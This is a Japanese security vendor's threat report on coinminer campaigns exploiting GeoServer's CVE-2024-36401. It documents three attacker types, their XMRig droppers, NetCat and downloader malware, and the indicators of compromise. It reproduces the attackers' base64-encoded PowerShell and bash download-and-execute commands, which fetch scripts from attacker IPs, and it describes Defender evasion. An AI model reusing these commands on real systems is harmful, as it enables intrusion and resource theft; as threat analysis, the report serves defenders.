多様なコインマイナー攻撃事例が確認されている GeoServer

AhnLab SEcurity intelligence Center (ASEC) は、過去に公開したブログ「GeoServer 脆弱性を悪用するコインマイナー攻撃の事例」において、パッチが適用されていない GeoServer を攻撃してコインマイナーと NetCat をインストールする事例を紹介した。[1] 脆弱な GeoServer を狙った攻撃は最近に至るまで継続的に確認されており、いずれもコインマイナーをインストールする点が共通している。本稿では、これまでに確認されたコインマイナーのインストール事例について解説する。

1. GeoServer

GeoServer は Java で開発されたオープンソースの GIS (Geographic Information System) サーバーであり、地理空間データの処理機能を提供するプラットフォームである。
2024年には、認証されていないユーザーがリモートコードを実行できる脆弱性 CVE-2024-36401 が公開され、その後、複数の攻撃者がこの脆弱性を悪用してマルウェアをインストールしている。

2024年9月には、Fortinet 社が CVE-2024-36401 を悪用し GOREVERSE、SideWalk、Mirai、Condi、CoinMiner などのマルウェアを配布する攻撃事例を公開した。[2] また、TrendMicro 社も Earth Baxia 攻撃者による攻撃キャンペーンを公開しており、台湾の地域機関を対象にスピアフィッシングと併せて CVE-2024-36401 が悪用されたことが確認されている。[3]

攻撃者が具体的にどのような手法で攻撃を行ったかの詳細は不明だが、脆弱なバージョンの GeoServer が導入されている環境が標的となっていることから、既知の脆弱性が悪用されたものと考えられる。

2. コインマイナー攻撃事例

2.1. Type A

Type A は以前のブログで紹介した攻撃者と同一であり、同じウォレットアドレスが使用されている。攻撃者は脆弱な GeoServer を攻撃し、以下のような PowerShell コマンドの実行や、「bash.exe」を悪用して Bash スクリプトを実行した。

> powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMgAyADAALgA4ADQALgAxADAANwAuADYAOQAvAGoAcwAvAGcAdwAuAHQAeAB0ACcAKQA=
> bash -c {echo,Y3VybCAtZnNTTCBodHRwOi8vMjIwLjg0LjEwNy42OS9qcy9nbC50eHQgfHNoCg==}|{base64,-d}|{bash,-i}

XMRig コインマイナーを含むマルウェアは以下のアドレスにアップロードされており、Batch 形式のマルウェア「gw.txt」または Bash 形式のマルウェア「gl.txt」によってダウンロード・インストールされる。Windows および Linux 環境におけるコインマイナーのインストール手順は従来と同様で、使用されるマルウェアとダウンロード先の URL のみが変更されている。

[図 1] マルウェアがアップロードされたアドレス

• url – 1 : pool.supportxmr[.]com:443
• url – 2 : 104.243.43[.]115:443
• user : “47DsNc5pK8rYBQF4ev3mNBct3tkkHuUmxeqCSSbX3YuBhXweSB9XeQbcPMqEBaSJy4bGrPxbdMJkphrVQ5AmastoEMpSjcU”
• pass : “x”

なお、同一の攻撃者は WebLogic サーバーを標的としたコインマイナーの配布も行っており、外部に公開された不特定多数のシステムをスキャンし、脆弱なサービスが確認された場合にコインマイナーをインストールしているとみられる。

> powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAxADkALgAxADkANAAuADEANQAzAC4AMwAxADoAOAAwADgAMAAvAGkAYwBvAG4ALwBqAHMALwB3AGkALgB0AHgAdAAnACk

[図 2] WebLogic サービスによって実行されたコインマイナーのインストールコマンド

• url – 1 : pool.supportxmr[.]com:80
• user : “47KoSaQXtpZ2AypuUm6pBgfUjfUuS1Fiy2jJRajdztpzGHrtLk3qPtQExCMd9PuRkBWPU4tDfoT7jXnYJPyEpDiF6qNuR7R”
• pass : “x”

2.2. Type B

別の攻撃者は、certutil コマンドを使用してマルウェアをインストールした。
最初にインストールされたマルウェアは RAR 形式の SFX ドロッパーで、内部に XMRig およびその設定情報を含んでいる。

[図 3] certutil を利用したマルウェアのインストール動作

実行時、C:\Program Files\Java\jre1.9.2_251 パスにマルウェアをインストールし、その後「3.bat」を実行する。
「3.bat」は、「bin」フォルダー内に存在する「javaws.exe」、すなわち NSSM を利用して XMRig である「java.exe」を起動する。

[図 4] ドロッパーマルウェアの内部ファイル

XMRig は攻撃者が独自に作成したもので、「config.json」などの設定ファイルを使用せず、設定データを内部に直接含んでいる。
「javap.exe」はローダーとして機能し、同一ディレクトリ内の「hello.dat」ファイルを読み込んで復号し、メモリ上で実行する。復号後の内容は、前述のタイプと同様に、マイニングプールのアドレスなどの設定情報を含む XMRig である。

[図 5] XMRig に含まれている設定情報

• url – 1 : ssl.aaaaaaaa[.]cyou:9655
• url – 2 : ssl.aaaaaaaa[.]cyou:9654
• url – 3 : xmr.aaaaaaaa[.]cyou:1110
• url – 4 : aaaaaaaa[.]cyou:443
• url – 5 : asia.aaaaaaaa[.]cyou:1110
• url – 6 : us.aaaaaaaa[.]cyou:1110
• url – 7 : eu.aaaaaaaa[.]cyou:1110
• user : “45PX6QS4EhgRC1YbPNPRz8GmhyF7N4WVxQssZnhhc7xodKNNrQiEqxz9uQEMD6e8isjHVHt3Vk9Nqh5HMRgjVw4RC61FY5W”
• pass – 1 : “x1999”
• pass – 2 : “x”

2.3. Type C

最後の攻撃者は、コインマイナーに加えて AnyDesk をインストールした痕跡が確認されており、独自に作成したダウンローダーを使用した点が特徴である。ただし、現時点ではダウンロードが不可能なため、実際にどのようなペイロードが取得されたかは不明である。

攻撃者は GeoServer を通じて実行した PowerShell コマンドにより、XMRig をインストールする役割を持つ Batch マルウェア「setupcache.bat」をインストールした。
なお、「Setup_AnyDesk.bat」は入手できていないが、ファイル名から推測すると AnyDesk をインストールする Batch スクリプトである可能性が高い。

「setupcache.bat」は、7z、NSSM、XMRig を含む圧縮ファイル「caches.zip」をダウンロードし、7z で展開後、NSSM を用いて XMRig をサービスとして登録する。
複数の攻撃事例において、少なくとも5種類以上のダウンロード URL が確認されており、圧縮ファイル名も「caches.zip」以外に、「cache.zip」「w3wp.zip」「iis.zip」などが使用された。

[図 6] ダウンローダー機能を担う Batch マルウェア

さらに、独自に作成したダウンローダーマルウェア「systemd」をインストールし、Windows Defender の除外設定への追加や無効化を試みた。
このダウンローダーは、C&C サーバーからペイロードをダウンロードしてメモリ上で実行する機能を持つが、分析時点ではダウンロードが不可能であったため、最終的なマルウェアの詳細は確認できていない。

[図 7] ダウンローダーのインストールおよび Windows Defender 回避ルーチン

• url – 1 : www[.]combilke[.]top:9200
• url – 2 : www[.]combilkee[.]top:9200
• url – 3 : www[.]cloudsecure[.]top:9200
• url – 4 : 154.89.152[.]204:9200
• url – 5 : 203.91.76[.]58:9200
• user : “49Qp2aEzUdEANd88muJEvDVKEzn9xbm5xEXjZ8QUeN1ndVxvtUuSjZAecFJHabrzYE2VXTu5sZM8H5GiKfKah1VJBwuWhYc”
• pass – 1 : “k2_7”
• pass – 2 : “k2_2”

[図 8] ダウンローダーマルウェア

3. まとめ

GeoServer のリモートコード実行脆弱性 (CVE-2024-36401) が公開されて以来、現在に至るまで、この脆弱性を悪用してマルウェアをインストールする攻撃が継続的に確認されている。
攻撃者は、Windows および Linux 環境を含め、脆弱な GeoServer が導入されているシステムを標的とし、さまざまな種類のコインマイナーをインストールしている。
コインマイナーがインストールされると、システムリソースを不正に使用して、攻撃者の Monero (XMR) をマイニングすることになる。さらに、同時にインストールされた NetCat を利用して追加のマルウェアをインストールしたり、システム内部の情報を窃取したりするなど、さらなる悪意ある動作が行われる可能性がある。